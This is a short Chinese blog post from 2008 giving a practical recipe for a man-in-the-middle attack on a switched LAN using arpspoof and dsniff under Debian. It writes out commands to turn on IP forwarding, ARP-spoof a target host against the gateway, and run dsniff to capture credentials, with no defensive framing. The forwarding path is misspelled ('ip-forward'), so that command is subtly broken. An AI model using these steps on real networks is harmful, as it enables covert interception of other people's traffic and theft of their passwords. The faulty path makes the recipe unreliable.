Chinaunix首页 | 论坛 | 博客
  • 博客访问: 543228
  • 博文数量: 56
  • 博客积分: 10010
  • 博客等级: 上将
  • 技术积分: 2255
  • 用 户 组: 普通用户
  • 注册时间: 2006-10-18 20:14
文章分类

全部博文(56)

文章存档

2011年(1)

2009年(6)

2008年(49)

我的朋友

分类: 网络与安全

2008-07-25 16:26:23

debian下arpspoof以及dsniff的简单使用组合
 
关于这两个工具的来头我就不在做太多的介绍,这里只是写下我自己对这两个工具的使用的心得
在现代的局域网当中,交换式局域网是主流,广播式的局域网已经或者不在存在,以前要嗅探局域网络上传输的信息只需将网卡设置为混合模式,通过捕获数据包的软件,就可以截取。现在交换式以太网或者局域网中,交换机通过查看路由表(不严格的说法)发送信息。要想截获两台主机中传递的信息可以通过arp欺骗获得。
在linux下使用arpspoof和dsniff欺骗的操作如下
首先打开linux自带的路由转发功能
编辑/proc/sys/net/ipv4/ip-forward文件
echo 1 > /proc/sys/net/ipv4/ip-forward
打开arpspoof
arpspoof -t 你要欺骗的主机ip地址 网关ip地址(这里你可以定向的你想要的ip地址) &(在后台运行)
打开dsniff
使用默认的捕获表
dsniff -c -f /usr/share/dsniff/dsniff.services (当然这里你可以自己定制需要捕获端口的规则)
具体写法可以cat /usr/share/dsniff/dsniff.services 查看编写的规则
阅读(1270) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~